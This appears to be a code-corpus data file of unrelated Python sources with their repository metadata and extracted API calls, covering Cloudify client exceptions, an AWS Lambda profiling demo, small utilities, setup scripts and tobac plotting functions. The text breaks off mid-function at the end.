ERROR_CODE = 'unsupported_deployment_get_secret_error'
class FunctionsEvaluationError(CloudifyClientError):
"""
Raised when function evaluation failed.
"""
ERROR_CODE = 'functions_evaluation_error'
class UnknownModificationStageError(CloudifyClientError):
"""
Raised when an unknown modification stage was provided.
"""
ERROR_CODE = 'unknown_modification_stage_error'
class ExistingStartedDeploymentModificationError(CloudifyClientError):
"""
Raised when a deployment modification start is attempted while another
deployment modification is currently started
"""
ERROR_CODE = 'existing_started_deployment_modification_error'
class DeploymentModificationAlreadyEndedError(CloudifyClientError):
"""
Raised when a deployment modification finish/rollback is attempted on
a deployment modification that has already been finished/rolledback
"""
ERROR_CODE = 'deployment_modification_already_ended_error'
class UserUnauthorizedError(CloudifyClientError):
"""
Raised when a call has been made to a secured resource with an
unauthorized user (no credentials / bad credentials)
"""
ERROR_CODE = 'unauthorized_error'
class ForbiddenError(CloudifyClientError):
"""
Raised when a call has been made by a user that is not permitted to
perform it
"""
ERROR_CODE = 'forbidden_error'
class PluginInUseError(CloudifyClientError):
"""
Raised if a central deployment agent plugin deletion is attempted and at
least one deployment is currently using this plugin.
"""
ERROR_CODE = 'plugin_in_use'
class PluginInstallationError(CloudifyClientError):
"""
Raised if a central deployment agent plugin installation fails.
"""
ERROR_CODE = 'plugin_installation_error'
class PluginInstallationTimeout(CloudifyClientError):
"""
Raised if a central deployment agent plugin installation times out.
"""
ERROR_CODE = 'plugin_installation_timeout'
class MaintenanceModeActiveError(CloudifyClientError):
"""
Raised when a call has been blocked due to maintenance mode being active.
"""
ERROR_CODE = 'maintenance_mode_active'
def __str__(self):
return self.message
class MaintenanceModeActivatingError(CloudifyClientError):
"""
Raised when a call has been blocked while maintenance mode is activating.
"""
ERROR_CODE = 'entering_maintenance_mode'
def __str__(self):
return self.message
class NotModifiedError(CloudifyClientError):
"""
Raised when a 304 not modified error was returned
"""
ERROR_CODE = 'not_modified'
def __str__(self):
return self.message
class InvalidExecutionUpdateStatus(CloudifyClientError):
"""
Raised when execution update failed do to invalid status update
"""
ERROR_CODE = 'invalid_exception_status_update'
class NotClusterMaster(CloudifyClientError):
"""
Raised when the request was served by a manager that is not the master
node of a manager cluster.
The client should query for the cluster status to learn the master's
address, and retry the request.
If the client stores the server address, it should update the storage
with the new master node address.
"""
ERROR_CODE = 'not_cluster_master'
class RemovedFromCluster(CloudifyClientError):
"""
Raised when attempting to contact a manager that was removed from a
cluster.
The client should retry the request with another manager in the cluster.
If the client stores the server address, it should remove this node's
address from storage.
"""
ERROR_CODE = 'removed_from_cluster'
class DeploymentPluginNotFound(CloudifyClientError):
"""
Raised when a plugin is listed in the blueprint but is not
installed on the manager.
"""
ERROR_CODE = 'deployment_plugin_not_found'
ERROR_MAPPING = dict([
(error.ERROR_CODE, error)
for error in [
DeploymentEnvironmentCreationInProgressError,
DeploymentEnvironmentCreationPendingError,
IllegalExecutionParametersError,
NoSuchIncludeFieldError,
MissingRequiredDeploymentInputError,
UnknownDeploymentInputError,
UnknownDeploymentSecretError,
UnsupportedDeploymentGetSecretError,
FunctionsEvaluationError,
UnknownModificationStageError,
ExistingStartedDeploymentModificationError,
DeploymentModificationAlreadyEndedError,
UserUnauthorizedError,
ForbiddenError,
MaintenanceModeActiveError,
MaintenanceModeActivatingError,
NotModifiedError,
InvalidExecutionUpdateStatus,
PluginInUseError,
PluginInstallationError,
PluginInstallationTimeout,
NotClusterMaster,
RemovedFromCluster,
DeploymentPluginNotFound]])
| [] |
sriharshams-aws/aws-codeguru-profiler-python-demo-application | sample-demo-lambda-app/lambda_function.py | 36e63bc6364871e6a7b29437c1fb68243d2c54f4 | import boto3
import logging
import os
from random import randrange
from urllib.request import urlopen
# It is not recommended to enable DEBUG logs in production,
# this is just to show an example of a recommendation
# by Amazon CodeGuru Profiler.
logging.getLogger('botocore').setLevel(logging.DEBUG)
SITE = 'http://www.python.org/'
CW_NAMESPACE = 'ProfilerPythonDemo'
S3_BUCKET = os.environ['S3_BUCKET']
def lambda_handler(event, context):
# Make some network calls using urllib and s3 client.
with urlopen(SITE) as response:
s3_client = boto3.client('s3')
s3_client.put_object(Body=response.read(),
Bucket=S3_BUCKET,
Key='response.txt')
# Publish metrics.
content_length = int(response.headers['Content-Length'])
put_metric('ResponseContentLength', content_length)
put_metric(str(response.status)[0] + 'xxStatus', 1)
# Generate some CPU-intensive work.
num = randrange(content_length)
count = 0
for _ in range(num):
x = randrange(num)
if check_prime(x):
count += 1
return count
def put_metric(name, value):
cw_client = boto3.client('cloudwatch')
metric_data_num = [{'MetricName': name, 'Value': value}]
cw_client.put_metric_data(Namespace=CW_NAMESPACE, MetricData=metric_data_num)
def check_prime(num):
if num == 1 or num == 0:
return False
sq_root = 2
while sq_root * sq_root <= num:
if num % sq_root == 0:
return False
sq_root += 1
return True
| [((32, 10, 32, 35), 'random.randrange', 'randrange', ({(32, 20, 32, 34): 'content_length'}, {}), '(content_length)', False, 'from random import randrange\n'), ((43, 16, 43, 42), 'boto3.client', 'boto3.client', ({(43, 29, 43, 41): '"""cloudwatch"""'}, {}), "('cloudwatch')", False, 'import boto3\n'), ((11, 0, 11, 29), 'logging.getLogger', 'logging.getLogger', ({(11, 18, 11, 28): '"""botocore"""'}, {}), "('botocore')", False, 'import logging\n'), ((20, 9, 20, 22), 'urllib.request.urlopen', 'urlopen', ({(20, 17, 20, 21): 'SITE'}, {}), '(SITE)', False, 'from urllib.request import urlopen\n'), ((21, 20, 21, 38), 'boto3.client', 'boto3.client', ({(21, 33, 21, 37): '"""s3"""'}, {}), "('s3')", False, 'import boto3\n'), ((35, 12, 35, 26), 'random.randrange', 'randrange', ({(35, 22, 35, 25): 'num'}, {}), '(num)', False, 'from random import randrange\n')] |
chuo06/palindrome | api/error_handler.py | 57660301390d7b2b05780e1f6ab0343e43726619 | from functools import wraps
from werkzeug.exceptions import HTTPException
from api.exceptions import MessageNotFound
def api_error_handler(func):
@wraps(func)
def handle_errors(*args, **kwargs):
try:
return func(*args, **kwargs)
except MessageNotFound as e:
return e.message, 404
except HTTPException:
raise
except Exception:
return "API Internal error", 500
return handle_errors
| [((7, 5, 7, 16), 'functools.wraps', 'wraps', ({(7, 11, 7, 15): 'func'}, {}), '(func)', False, 'from functools import wraps\n')] |
kootsZhin/nile | src/nile/core/run.py | 5b685158c06418a126229cfbcaeaaf78a38cd8a0 | """Command to run Nile scripts."""
import logging
from importlib.machinery import SourceFileLoader
from nile.nre import NileRuntimeEnvironment
def run(path, network):
"""Run nile scripts passing on the NRE object."""
logger = logging.getLogger()
logger.disabled = True
script = SourceFileLoader("script", path).load_module()
nre = NileRuntimeEnvironment(network)
script.run(nre)
| [((10, 13, 10, 32), 'logging.getLogger', 'logging.getLogger', ({}, {}), '()', False, 'import logging\n'), ((13, 10, 13, 41), 'nile.nre.NileRuntimeEnvironment', 'NileRuntimeEnvironment', ({(13, 33, 13, 40): 'network'}, {}), '(network)', False, 'from nile.nre import NileRuntimeEnvironment\n'), ((12, 13, 12, 45), 'importlib.machinery.SourceFileLoader', 'SourceFileLoader', ({(12, 30, 12, 38): '"""script"""', (12, 40, 12, 44): 'path'}, {}), "('script', path)", False, 'from importlib.machinery import SourceFileLoader\n')] |
PawarAditi/HackerRank | Python/Basic Data Types/Lists/Solution.py | fcd9d1450ee293372ce5f1d4a3b7284ecf472657 | array = []
for _ in range(int(input())):
command = input().strip().split(" ")
cmd_type = command[0]
if (cmd_type == "print"):
print(array)
elif (cmd_type == "sort"):
array.sort()
elif (cmd_type == "reverse"):
array.reverse()
elif (cmd_type == "pop"):
array.pop()
elif (cmd_type == "remove"):
array.remove(int(command[1]))
elif (cmd_type == "append"):
array.append(int(command[1]))
elif (cmd_type == "insert"):
array.insert(int(command[1]), int(command[2])) | [] |
horeapinca/DBEstClient | dbestclient/ml/density.py | 6ccbb24853c31f2a8cc567e03c09ca7aa31e2d26 | # Created by Qingzhi Ma at 2019-07-23
# All right reserved
# Department of Computer Science
# the University of Warwick
# [email protected]
from sklearn.neighbors import KernelDensity
class DBEstDensity:
def __init__(self, kernel=None):
if kernel is None:
self.kernel = 'gaussian'
self.kde = None
def fit(self, x):
self.kde = KernelDensity(kernel=self.kernel).fit(x)
return self.kde | [((17, 19, 17, 52), 'sklearn.neighbors.KernelDensity', 'KernelDensity', (), '', False, 'from sklearn.neighbors import KernelDensity\n')] |
panchambanerjee/access_spotify | setup.py | d1c50d1553718755d58d034e8d2049f986ef5f84 | #!/usr/bin/env python
import setuptools
from setuptools import setup
from os import path
# Read the package requirements
with open("requirements.txt", "r") as f:
requirements = [line.rstrip("\n") for line in f if line != "\n"]
# Read the contents of the README file
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(name='access-spotify',
version="1.1",
author="pancham_banerjee",
author_email="[email protected]",
packages=setuptools.find_packages(),
scripts=["./bin/access_script.py"],
install_requires=requirements,
license="MIT",
description="A package to get all album and track info for an artist by querying the Spotify API",
long_description=long_description,
long_description_content_type='text/markdown'
)
| [((12, 30, 12, 52), 'os.path.dirname', 'path.dirname', ({(12, 43, 12, 51): '__file__'}, {}), '(__file__)', False, 'from os import path\n'), ((13, 10, 13, 48), 'os.path.join', 'path.join', ({(13, 20, 13, 34): 'this_directory', (13, 36, 13, 47): '"""README.md"""'}, {}), "(this_directory, 'README.md')", False, 'from os import path\n'), ((20, 15, 20, 41), 'setuptools.find_packages', 'setuptools.find_packages', ({}, {}), '()', False, 'import setuptools\n')] |
hugocpolos/MundiAPI-PYTHON | mundiapi/models/update_plan_request.py | 164545cc58bf18c946d5456e9ba4d55a378a339a | # -*- coding: utf-8 -*-
"""
mundiapi
This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ).
"""
class UpdatePlanRequest(object):
"""Implementation of the 'UpdatePlanRequest' model.
Request for updating a plan
Attributes:
name (string): Plan's name
description (string): Description
installments (list of int): Number os installments
statement_descriptor (string): Text that will be shown on the credit
card's statement
currency (string): Currency
interval (string): Interval
interval_count (int): Interval count
payment_methods (list of string): Payment methods accepted by the
plan
billing_type (string): Billing type
status (string): Plan status
shippable (bool): Indicates if the plan is shippable
billing_days (list of int): Billing days accepted by the plan
metadata (dict<object, string>): Metadata
minimum_price (int): Minimum price
trial_period_days (int): Number of trial period in days, where the
customer will not be charged
"""
# Create a mapping from Model property names to API property names
_names = {
"name":'name',
"description":'description',
"installments":'installments',
"statement_descriptor":'statement_descriptor',
"currency":'currency',
"interval":'interval',
"interval_count":'interval_count',
"payment_methods":'payment_methods',
"billing_type":'billing_type',
"status":'status',
"shippable":'shippable',
"billing_days":'billing_days',
"metadata":'metadata',
"minimum_price":'minimum_price',
"trial_period_days":'trial_period_days'
}
def __init__(self,
name=None,
description=None,
installments=None,
statement_descriptor=None,
currency=None,
interval=None,
interval_count=None,
payment_methods=None,
billing_type=None,
status=None,
shippable=None,
billing_days=None,
metadata=None,
minimum_price=None,
trial_period_days=None):
"""Constructor for the UpdatePlanRequest class"""
# Initialize members of the class
self.name = name
self.description = description
self.installments = installments
self.statement_descriptor = statement_descriptor
self.currency = currency
self.interval = interval
self.interval_count = interval_count
self.payment_methods = payment_methods
self.billing_type = billing_type
self.status = status
self.shippable = shippable
self.billing_days = billing_days
self.metadata = metadata
self.minimum_price = minimum_price
self.trial_period_days = trial_period_days
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
name = dictionary.get('name')
description = dictionary.get('description')
installments = dictionary.get('installments')
statement_descriptor = dictionary.get('statement_descriptor')
currency = dictionary.get('currency')
interval = dictionary.get('interval')
interval_count = dictionary.get('interval_count')
payment_methods = dictionary.get('payment_methods')
billing_type = dictionary.get('billing_type')
status = dictionary.get('status')
shippable = dictionary.get('shippable')
billing_days = dictionary.get('billing_days')
metadata = dictionary.get('metadata')
minimum_price = dictionary.get('minimum_price')
trial_period_days = dictionary.get('trial_period_days')
# Return an object of this model
return cls(name,
description,
installments,
statement_descriptor,
currency,
interval,
interval_count,
payment_methods,
billing_type,
status,
shippable,
billing_days,
metadata,
minimum_price,
trial_period_days)
| [] |
bertokhoury/python-hearthstone | hearthstone/hslog/utils.py | 635a8a14b85f468c1ab1d0bc9d0bcffaa00fda43 | from hearthstone.enums import GameTag, TAG_TYPES
def parse_enum(enum, value):
if value.isdigit():
value = int(value)
elif hasattr(enum, value):
value = getattr(enum, value)
else:
raise Exception("Unhandled %s: %r" % (enum, value))
return value
def parse_tag(tag, value):
tag = parse_enum(GameTag, tag)
if tag in TAG_TYPES:
value = parse_enum(TAG_TYPES[tag], value)
elif value.isdigit():
value = int(value)
else:
raise NotImplementedError("Invalid string value %r = %r" % (tag, value))
return tag, value
| [] |
ernestoarzabala/Curso-Python-Utch | ejemplo_clase_00.py | ed5cd89ed85a1021d78fd17d495b3b3ec0203c77 | # Archivo ejemplo 00 de creacion de clases en Python
from math import gcd # greatest common denominator = Maximo Comun Divisor (MCD)
class Fraccion:
""" La clase Fraccion: Una fraccion es un part de enteros: un numerador (num)
y un denominador (den !=0 ) cuyo MCD es 1.
"""
def __init__(self,numerador,denominador):
""" Constructor de la clase. Construye una fracción a partir de dos enteros:
un numerador y un denominador.
¡El constructor se enloquece si el denominador es cero!
Nota mental:Agregar manejo de error para denominador igual a cero.
"""
numerador = int(numerador)
denominador = int(denominador)
hcf = gcd(numerador,denominador)
self.num, self.den = numerador/hcf, denominador/hcf
def __str__(self):
""" Generador de strings para representar una fracción.
Se necesita si se desea convertir ,o mostrar, una fraccion a string.
"""
return "%d/%d" % (self.num,self.den)
def __mul__(self,otrafraccion):
""" Función necesaria para el operador de multiplicación.
Multiplica dos fracciones para obtener una fraccion resultante
"""
return Fraccion(self.num*otrafraccion.num,self.den*otrafraccion.den)
def __add__(self,otrafraccion):
"""Función necesaria para el operador de suma.
Suma dos fracciones para obtener una fraccion resultante
"""
return Fraccion(self.num*otrafraccion.den+self.den*otrafraccion.num,self.den*otrafraccion.den)
def a_numero_real(self):
""" Función para convertir la fracción a un numero de punto flotante.
El equivalente numérico con punto decimal de la fracción.
"""
return float(self.num)/float(self.den)
if __name__ == "__main__":
a = Fraccion(5,12)
print(a)
b = Fraccion(3,5)
c = a*b
c_real = c.a_numero_real()
print("Multiplicar la fraccion {} por la fraccion {} da como resultado la fraccion {} que es equivalente a {}".format(a,b,c,c_real))# Escribe tu código aquí :-)
a = Fraccion(1,2)
print(a)
b = Fraccion(1,4)
c = a+b
c_real = c.a_numero_real()
print("Sumar la fraccion {} con la fraccion {} da como resultado la fraccion {} que es equivalente a {}".format(a,b,c,c_real))# Escribe tu código aquí :-)
| [((18, 14, 18, 40), 'math.gcd', 'gcd', ({(18, 18, 18, 27): 'numerador', (18, 28, 18, 39): 'denominador'}, {}), '(numerador, denominador)', False, 'from math import gcd\n')] |
odoochain/addons_oca | addons14/base_rest/__init__.py | 55d456d798aebe16e49b4a6070765f206a8885ca | from . import models
from . import components
from . import http
| [] |
WingCode/live-project | recs/live_project_popularity_recommender.py | 977dfbcaade35d8173dbb6ace102fe8998f1cdf4 | import os
import pandas as pd
class LiveProjectPopularityBasedRecs:
def __init__(self):
self.charts = {}
charts_folder = "charts"
if os.path.isdir(charts_folder):
for file in os.listdir("charts"):
name, ext = file.split('.')
if ext == "csv" and len(name) > 0:
self.charts[name] = pd.read_csv("{}/{}".format(charts_folder, file), index_col=0)
else:
print("Genre Global and Charts not implemented!")
def genre_chart(self, genre):
if genre in self.charts:
return self.charts[genre]
elif "Top" in self.charts:
return self.charts["Top"]
else:
return ""
| [((11, 11, 11, 39), 'os.path.isdir', 'os.path.isdir', ({(11, 25, 11, 38): 'charts_folder'}, {}), '(charts_folder)', False, 'import os\n'), ((13, 24, 13, 44), 'os.listdir', 'os.listdir', ({(13, 35, 13, 43): '"""charts"""'}, {}), "('charts')", False, 'import os\n')] |
hipnusleo/Laserjet | resource/pypi/cffi-1.9.1/testing/cffi0/snippets/distutils_module/setup.py | f53e0b740f48f2feb0c0bb285ec6728b313b4ccc |
from distutils.core import setup
import snip_basic_verify
setup(
py_modules=['snip_basic_verify'],
ext_modules=[snip_basic_verify.ffi.verifier.get_extension()])
| [((7, 17, 7, 63), 'snip_basic_verify.ffi.verifier.get_extension', 'snip_basic_verify.ffi.verifier.get_extension', ({}, {}), '()', False, 'import snip_basic_verify\n')] |
elise-baumgartner/onramp | pce/src/testing/test_pce.py | beb3c807264fcb70d8069ff2e3990b0ce3f59912 | #!../env/bin/python
"""A simple test script for the PCE portion of OnRamp.
Usage: ./test_pce.py
This script is only intended to be run in a fresh install of the repository. It
has side-effects that could corrupt module and user data if run in a production
setting.
Prior to running this script, ensure that onramp/pce/bin/onramp_pce_install.py
has been called and that the server is running. Also Ensure
./test_pce_config.cfg contains the proper settings.
"""
import nose
import sys
if __name__ == '__main__':
print (__doc__)
response = raw_input('(C)ontinue or (A)bort? ')
if response != 'C':
sys.exit(0)
nose.main()
| [((23, 4, 23, 15), 'nose.main', 'nose.main', ({}, {}), '()', False, 'import nose\n'), ((21, 8, 21, 19), 'sys.exit', 'sys.exit', ({(21, 17, 21, 18): '(0)'}, {}), '(0)', False, 'import sys\n')] |
w-herbst/tobac | tobac/plotting.py | 9f3b9812e9a13a26373e42d356f7d571366bb967 | import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
import logging
from .analysis import lifetime_histogram
from .analysis import histogram_cellwise,histogram_featurewise
import numpy as np
def plot_tracks_mask_field_loop(track,field,mask,features,axes=None,name=None,plot_dir='./',
figsize=(10./2.54,10./2.54),dpi=300,
margin_left=0.05,margin_right=0.05,margin_bottom=0.05,margin_top=0.05,
**kwargs):
import cartopy.crs as ccrs
import os
from iris import Constraint
os.makedirs(plot_dir,exist_ok=True)
time=mask.coord('time')
if name is None:
name=field.name()
for time_i in time.points:
datetime_i=time.units.num2date(time_i)
constraint_time = Constraint(time=datetime_i)
fig1,ax1=plt.subplots(ncols=1, nrows=1,figsize=figsize, subplot_kw={'projection': ccrs.PlateCarree()})
datestring_file=datetime_i.strftime('%Y-%m-%d_%H:%M:%S')
field_i=field.extract(constraint_time)
mask_i=mask.extract(constraint_time)
track_i=track[track['time']==datetime_i]
features_i=features[features['time']==datetime_i]
ax1=plot_tracks_mask_field(track=track_i,field=field_i,mask=mask_i,features=features_i,
axes=ax1,**kwargs)
fig1.subplots_adjust(left=margin_left, bottom=margin_bottom, right=1-margin_right, top=1-margin_top)
os.makedirs(plot_dir, exist_ok=True)
savepath_png=os.path.join(plot_dir,name+'_'+datestring_file+'.png')
fig1.savefig(savepath_png,dpi=dpi)
logging.debug('Figure plotted to ' + str(savepath_png))
plt.close()
def plot_tracks_mask_field(track,field,mask,features,axes=None,axis_extent=None,
plot_outline=True,
plot_marker=True,marker_track='x',markersize_track=4,
plot_number=True,
plot_features=False,marker_feature=None,markersize_feature=None,
title=None,title_str=None,
vmin=None,vmax=None,n_levels=50,
cmap='viridis',extend='neither',
orientation_colorbar='horizontal',pad_colorbar=0.05,
label_colorbar=None,fraction_colorbar=0.046,
rasterized=True,linewidth_contour=1
):
import cartopy
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
import iris.plot as iplt
from matplotlib.ticker import MaxNLocator
import cartopy.feature as cfeature
from .utils import mask_features,mask_features_surface
from matplotlib import ticker
if type(axes) is not cartopy.mpl.geoaxes.GeoAxesSubplot:
raise ValueError('axes had to be cartopy.mpl.geoaxes.GeoAxesSubplot')
datestr=field.coord('time').units.num2date(field.coord('time').points[0]).strftime('%Y-%m-%d %H:%M:%S')
if title is 'datestr':
if title_str is None:
titlestring=datestr
elif type(title_str is str):
titlestring=title+ ' ' + datestr
axes.set_title(titlestring,horizontalalignment='left',loc='left')
gl = axes.gridlines(draw_labels=True)
majorLocator = MaxNLocator(nbins=5,steps=[1,2,5,10])
gl.xlocator=majorLocator
gl.ylocator=majorLocator
gl.xformatter = LONGITUDE_FORMATTER
axes.tick_params(axis='both', which='major')
gl.yformatter = LATITUDE_FORMATTER
gl.xlabels_top = False
gl.ylabels_right = False
axes.coastlines('10m')
# rivers=cfeature.NaturalEarthFeature(category='physical', name='rivers_lake_centerlines',scale='10m',facecolor='none')
lakes=cfeature.NaturalEarthFeature(category='physical', name='lakes',scale='10m',facecolor='none')
axes.add_feature(lakes, edgecolor='black')
axes.set_xlabel('longitude')
axes.set_ylabel('latitude')
# Plot the background field
if np.any(~np.isnan(field.data)): # check if field to plot is not only nan, which causes error:
plot_field=iplt.contourf(field,coords=['longitude','latitude'],
levels=np.linspace(vmin,vmax,num=n_levels),extend=extend,
axes=axes,
cmap=cmap,vmin=vmin,vmax=vmax,zorder=1
)
if rasterized:
axes.set_rasterization_zorder(1)
# create colorbar for background field:
cbar=plt.colorbar(plot_field,orientation=orientation_colorbar, pad=pad_colorbar,fraction=fraction_colorbar,ax=axes)
if label_colorbar is None:
label_colorbar=field.name()+ '('+field.units.symbol +')'
if orientation_colorbar is 'horizontal':
cbar.ax.set_xlabel(label_colorbar)
elif orientation_colorbar is 'vertical':
cbar.ax.set_ylabel(label_colorbar)
tick_locator = ticker.MaxNLocator(nbins=5)
cbar.locator = tick_locator
cbar.update_ticks()
colors_mask=['darkred','orange','crimson','red','darkorange']
#if marker_feature is not explicitly given, set it to marker_track (will then be overwritten by the coloured markers)
if marker_feature is None:
maker_feature=marker_track
if markersize_feature is None:
makersize_feature=markersize_track
#Plot the identified features by looping over rows of DataFrame:
if plot_features:
for i_row,row in features.iterrows():
axes.plot(row['longitude'],row['latitude'],
color='grey',marker=maker_feature,markersize=makersize_feature)
# restrict features to featues inside axis extent
track=track.loc[(track['longitude'] > axis_extent[0])
& (track['longitude'] < axis_extent[1])
& (track['latitude'] > axis_extent[2])
& (track['latitude'] < axis_extent[3])]
#Plot tracked features by looping over rows of Dataframe
for i_row,row in track.iterrows():
feature=row['feature']
cell=row['cell']
if not np.isnan(cell):
color=colors_mask[int(cell%len(colors_mask))]
if plot_number:
cell_string=' '+str(int(row['cell']))
axes.text(row['longitude'],row['latitude'],cell_string,
color=color,fontsize=6, clip_on=True)
else:
color='grey'
if plot_outline:
mask_i=None
# if mask is 3D, create surface projection, if mask is 2D keep the mask
if mask.ndim==2:
mask_i=mask_features(mask,feature,masked=False)
elif mask.ndim==3:
mask_i=mask_features_surface(mask,feature,masked=False,z_coord='model_level_number')
else:
raise ValueError('mask has shape that cannot be understood')
# plot countour lines around the edges of the mask
iplt.contour(mask_i,coords=['longitude','latitude'],
levels=[0,feature],
colors=color,linewidths=linewidth_contour,
axes=axes)
if plot_marker:
axes.plot(row['longitude'],row['latitude'],
color=color,marker=marker_track,markersize=markersize_track)
axes.set_extent(axis_extent)
return axes
def animation_mask_field(track,features,field,mask,interval=500,figsize=(10,10),**kwargs):
import cartopy.crs as ccrs
import matplotlib.pyplot as plt
import matplotlib.animation
from iris import Constraint
fig=plt.figure(figsize=figsize)
plt.close()
def update(time_in):
fig.clf()
ax=fig.add_subplot(111,projection=ccrs.PlateCarree())
constraint_time = Constraint(time=time_in)
field_i=field.extract(constraint_time)
mask_i=mask.extract(constraint_time)
track_i=track[track['time']==time_in]
features_i=features[features['time']==time_in]
#fig1,ax1=plt.subplots(ncols=1, nrows=1,figsize=figsize, subplot_kw={'projection': ccrs.PlateCarree()})
plot_tobac=plot_tracks_mask_field(track_i,field=field_i,mask=mask_i,features=features_i,
axes=ax,
**kwargs)
ax.set_title('{}'.format(time_in))
time=field.coord('time')
datetimes=time.units.num2date(time.points)
animation = matplotlib.animation.FuncAnimation(fig, update,init_func=None, frames=datetimes,interval=interval, blit=False)
return animation
def plot_mask_cell_track_follow(cell,track, cog, features, mask_total,
field_contour, field_filled,
width=10000,
name= 'test', plotdir='./',
file_format=['png'],figsize=(10/2.54, 10/2.54),dpi=300,
**kwargs):
'''Make plots for all cells centred around cell and with one background field as filling and one background field as contrours
Input:
Output:
'''
from iris import Constraint
from numpy import unique
import os
track_cell=track[track['cell']==cell]
for i_row,row in track_cell.iterrows():
constraint_time = Constraint(time=row['time'])
constraint_x = Constraint(projection_x_coordinate = lambda cell: row['projection_x_coordinate']-width < cell < row['projection_x_coordinate']+width)
constraint_y = Constraint(projection_y_coordinate = lambda cell: row['projection_y_coordinate']-width < cell < row['projection_y_coordinate']+width)
constraint = constraint_time & constraint_x & constraint_y
mask_total_i=mask_total.extract(constraint)
if field_contour is None:
field_contour_i=None
else:
field_contour_i=field_contour.extract(constraint)
if field_filled is None:
field_filled_i=None
else:
field_filled_i=field_filled.extract(constraint)
cells=list(unique(mask_total_i.core_data()))
if cell not in cells:
cells.append(cell)
if 0 in cells:
cells.remove(0)
track_i=track[track['cell'].isin(cells)]
track_i=track_i[track_i['time']==row['time']]
if cog is None:
cog_i=None
else:
cog_i=cog[cog['cell'].isin(cells)]
cog_i=cog_i[cog_i['time']==row['time']]
if features is None:
features_i=None
else:
features_i=features[features['time']==row['time']]
fig1, ax1 = plt.subplots(ncols=1, nrows=1, figsize=figsize)
fig1.subplots_adjust(left=0.2, bottom=0.15, right=0.85, top=0.80)
datestring_stamp = row['time'].strftime('%Y-%m-%d %H:%M:%S')
celltime_stamp = "%02d:%02d:%02d" % (row['time_cell'].dt.total_seconds() // 3600,(row['time_cell'].dt.total_seconds() % 3600) // 60, row['time_cell'].dt.total_seconds() % 60 )
title=datestring_stamp + ' , ' + celltime_stamp
datestring_file = row['time'].strftime('%Y-%m-%d_%H%M%S')
ax1=plot_mask_cell_individual_follow(cell_i=cell,track=track_i, cog=cog_i,features=features_i,
mask_total=mask_total_i,
field_contour=field_contour_i, field_filled=field_filled_i,
width=width,
axes=ax1,title=title,
**kwargs)
out_dir = os.path.join(plotdir, name)
os.makedirs(out_dir, exist_ok=True)
if 'png' in file_format:
savepath_png = os.path.join(out_dir, name + '_' + datestring_file + '.png')
fig1.savefig(savepath_png, dpi=dpi)
logging.debug('field_contour field_filled Mask plot saved to ' + savepath_png)
if 'pdf' in file_format:
savepath_pdf = os.path.join(out_dir, name + '_' + datestring_file + '.pdf')
fig1.savefig(savepath_pdf, dpi=dpi)
logging.debug('field_contour field_filled Mask plot saved to ' + savepath_pdf)
plt.close()
plt.clf()
def plot_mask_cell_individual_follow(cell_i,track, cog,features, mask_total,
field_contour, field_filled,
axes=None,width=10000,
label_field_contour=None, cmap_field_contour='Blues',norm_field_contour=None,
linewidths_contour=0.8,contour_labels=False,
vmin_field_contour=0,vmax_field_contour=50,levels_field_contour=None,nlevels_field_contour=10,
label_field_filled=None,cmap_field_filled='summer',norm_field_filled=None,
vmin_field_filled=0,vmax_field_filled=100,levels_field_filled=None,nlevels_field_filled=10,
title=None
):
'''Make individual plot for cell centred around cell and with one background field as filling and one background field as contrours
Input:
Output:
'''
import numpy as np
from .utils import mask_cell_surface
from mpl_toolkits.axes_grid1 import make_axes_locatable
from matplotlib.colors import Normalize
divider = make_axes_locatable(axes)
x_pos=track[track['cell']==cell_i]['projection_x_coordinate'].item()
y_pos=track[track['cell']==cell_i]['projection_y_coordinate'].item()
if field_filled is not None:
if levels_field_filled is None:
levels_field_filled=np.linspace(vmin_field_filled,vmax_field_filled, nlevels_field_filled)
plot_field_filled = axes.contourf((field_filled.coord('projection_x_coordinate').points-x_pos)/1000,
(field_filled.coord('projection_y_coordinate').points-y_pos)/1000,
field_filled.data,
cmap=cmap_field_filled,norm=norm_field_filled,
levels=levels_field_filled,vmin=vmin_field_filled, vmax=vmax_field_filled)
cax_filled = divider.append_axes("right", size="5%", pad=0.1)
norm_filled= Normalize(vmin=vmin_field_filled, vmax=vmax_field_filled)
sm_filled= plt.cm.ScalarMappable(norm=norm_filled, cmap = plot_field_filled.cmap)
sm_filled.set_array([])
cbar_field_filled = plt.colorbar(sm_filled, orientation='vertical',cax=cax_filled)
cbar_field_filled.ax.set_ylabel(label_field_filled)
cbar_field_filled.set_clim(vmin_field_filled, vmax_field_filled)
if field_contour is not None:
if levels_field_contour is None:
levels_field_contour=np.linspace(vmin_field_contour, vmax_field_contour, nlevels_field_contour)
if norm_field_contour:
vmin_field_contour=None,
vmax_field_contour=None,
plot_field_contour = axes.contour((field_contour.coord('projection_x_coordinate').points-x_pos)/1000,
(field_contour.coord('projection_y_coordinate').points-y_pos)/1000,
field_contour.data,
cmap=cmap_field_contour,norm=norm_field_contour,
levels=levels_field_contour,vmin=vmin_field_contour, vmax=vmax_field_contour,
linewidths=linewidths_contour)
if contour_labels:
axes.clabel(plot_field_contour, fontsize=10)
cax_contour = divider.append_axes("bottom", size="5%", pad=0.1)
if norm_field_contour:
vmin_field_contour=None
vmax_field_contour=None
norm_contour=norm_field_contour
else:
norm_contour= Normalize(vmin=vmin_field_contour, vmax=vmax_field_contour)
sm_contour= plt.cm.ScalarMappable(norm=norm_contour, cmap = plot_field_contour.cmap)
sm_contour.set_array([])
cbar_field_contour = plt.colorbar(sm_contour, orientation='horizontal',ticks=levels_field_contour,cax=cax_contour)
cbar_field_contour.ax.set_xlabel(label_field_contour)
cbar_field_contour.set_clim(vmin_field_contour, vmax_field_contour)
for i_row, row in track.iterrows():
cell = int(row['cell'])
if cell==cell_i:
color='darkred'
else:
color='darkorange'
cell_string=' '+str(int(row['cell']))
axes.text((row['projection_x_coordinate']-x_pos)/1000,
(row['projection_y_coordinate']-y_pos)/1000,
cell_string,color=color,fontsize=6, clip_on=True)
# Plot marker for tracked cell centre as a cross
axes.plot((row['projection_x_coordinate']-x_pos)/1000,
(row['projection_y_coordinate']-y_pos)/1000,
